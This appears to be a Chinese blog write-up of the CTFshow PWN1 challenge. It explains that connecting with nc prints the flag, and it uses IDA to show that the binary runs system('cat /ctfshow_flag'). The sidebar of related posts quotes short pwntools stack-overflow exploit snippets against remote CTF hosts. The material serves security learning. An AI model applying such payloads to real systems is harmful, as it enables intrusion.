CTFshow PWN1

最新推荐文章于 2024-03-08 17:32:29 发布
最新推荐文章于 2024-03-08 17:32:29 发布
阅读量125 收藏
点赞数
分类专栏: CTFshow PWN入门 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60737948/article/details/133514167
版权

一、前置知识

nc命令的基本用法:

nc remote port

nc 远程地址 端口号

nc命令的详细用法可以看:nc命令使用小结 - 王奥的文章 - 知乎 https://zhuanlan.zhihu.com/p/270185285

二、解题思路

直接nc连接,自动获取flag

三、题目总结

题目还可以细挖下去:为什么nc连接就能弹flag呢?

下载附件,用IDA打开(我用的是IDA PRO 7.7)

先挖个坑,以后更新一个PWN工具安装合集...

查看main函数,F5反编译,可以发现执行了system函数

system函数的作用是将传入的参数作为系统命令执行

我们在虚拟机环境运行一下system函数中的命令

cat /ctfshow_flag:是显示根目录下的ctfshow_flag文件内容

当根目录没有ctfshow_flag文件时,无法显示内容

通过touch创建根目录下的ctfshow_flag文件,echo写入”test_flag“后,可以显示内容

运行pwn程序(如果没有执行权限可以chmod授权)

可以发现程序运行结果和控制台输入命令的结果是一样的

Ji3rry
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
2021-鹏城实验室-pwn-babyheap.zip
09-28
2021年鹏城实验室的pwn题,考查了libc-2.31.so下off-by-null的漏洞利用,值得学习一波。
CTFpwn入门学习01
2301_79880074的博客
01-26 1632
寒假学习计划第一轮,通过四道典型题回顾复习。
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 2990
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
ctfpwn入门第一次学堆
2301_79880074的博客
03-08 757
先通过一篇博客去大概的了解一下堆的前置基础知识吧,我做了一道2.23版本的堆题,在诸多版本中算是比较简单的一个题了。
CTFshow-pwn入门-前置基础
akdelt的博客
01-15 539
esi 存储的是 msg 的地址,然后寄存器间接寻址把 msg 地址的内容拿出来给 eax 了。我们直接用 ida 看看 080490E8 地址上的值就行了。:运行此文件,将得到的字符串以ctfshow{xxxxx}提交。计算一下 eax 寄存器的值就行了(好臭的 flag,悲。所以我们把下载好的 elf 文件拿去执行即可。:寄存器间接寻址方式结束后eax寄存器的值为?: 立即寻址方式结束后eax寄存器的值为?:寄存器寻址方式结束后edx寄存器的值为?:直接寻址方式结束后ecx寄存器的值为?
ctfshow pwn1
qq_39980610的博客
08-19 290
pwn1
PWN-PRACTICE-CTFSHOW-1
P1umH0的博客
01-13 368
PWN-PRACTICE-CTFSHOW-1PWN签到题pwn02pwn03pwn04 PWN签到题 nc连上去就会打印flag pwn02 栈溢出,覆盖返回地址为后门函数stack起始地址即可 # -*- coding:utf-8 -*- from pwn import * #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28194) elf=ELF("./pwn1") stack=0x0804850F io.recvuntil("3
CTFshow PWN入门 Test_your_nc
2301_79612324的博客
12-24 390
需使用chmod +x给文件添加可执行权限system()函数里参数为"cat /ctfshow_flag",直接nc运行即可得到flag。
pwn(1)-栈溢出(上)
qq_73667990的博客
06-08 759
0x7fffffffcb18和0x7ffffffffcb28中,再后面就是函数返回地址了。gets函数可以无限写入,把前面注满,就到了存储返回地址的地址,就可以改变返回地址。gdb调试到push操作esp会减少4,ebp不变,只改变栈顶。后面的3131就是输入1的填充结果,如果我们把这个地址填充成。栈的高地址在下低地址在上,先进入的数据压入栈底。要想修改返回地址,就要知道要溢出多少个字节。可以看到,他会提示你该返回地址不存在。我们把它输入到程序,可以看到地址被修改。运行到ret后,返回会main函数,
CTFshow——Pwn(1)
Y_peak的博客
02-24 378
CTFshow——Pwn(1) 有点懒不想写write up了。只有exploit。 PWN签到题 from pwn import * p = remote('xxx',xxx) p.interactive() pwn02 from pwn import * p =remote("pwn.chall.ctf.show",28006) p.sendline('a'*(0x9+4) + p32(0x0804850F)) p.interactive() pwn03 from pwn import * from
第五届“强网”拟态防御之PWN1与近段时间对unlink的理解
Probeginner的博客
11-06 305
来个拟态防御简单一题
pwn1 一道pwn练习题
05-07
pwn练习题
Pwn入门指北1
08-03
1. 各大主流平台汇编语言,例如x86与arm 2. C语言 5. 计算机组成原理 6. 计算机操作系统 7. 编译原理 1 . 关于环境 2 . 面向萌新的一
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
ctfshow 基础pwn wp
n1ptune__的博客
05-29 682
PWN01 简单栈溢出,ret2text from pwn import * #p = process("./pwn1") p = remote(ip,port) p.recv() payload = 'a'*(0x9+4) + p32(0x0804850F) p.sendline(payload) p.interactive() PWN03 32为程序,栈溢出,无system,ret2libc,32位程序通过栈传参 from pwn import * from LibcSearcher import *
CTFshow-pwn入门-Test_your_nc
T1ngSh0w的博客
06-17 1690
ctfshow-pwn入门-test_your_nc-pwn0-pwn4
Pwn_CTFShow_01
Trick的博客
11-08 759
Pwn_CTFShow1.PWN签到题2.pwn02 1.PWN签到题 直接 nc 出flag,白给 2.pwn02 file 一下 32bit IDA分析 发现 bin/sh 地址 可以用 cyclic生成字符串,然后gdb run一下,再计算出偏移 cyclic -l 0x...... exp: from pwn import * #p=process('') p=remote('111.231.70.44',28042) paylode='a'*13 + p32(0x8048518)
ctfshow pwn
08-07
你想了解关于 CTFShow Pwn 的信息吗?CTFShow 是一个国内知名的CTF比赛平台,Pwn 则是其中的一个攻防领域,主要涉及利用漏洞进行系统攻击和控制的技术。在 CTFShow Pwn 中,参赛选手需要通过分析二进制程序的漏洞,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值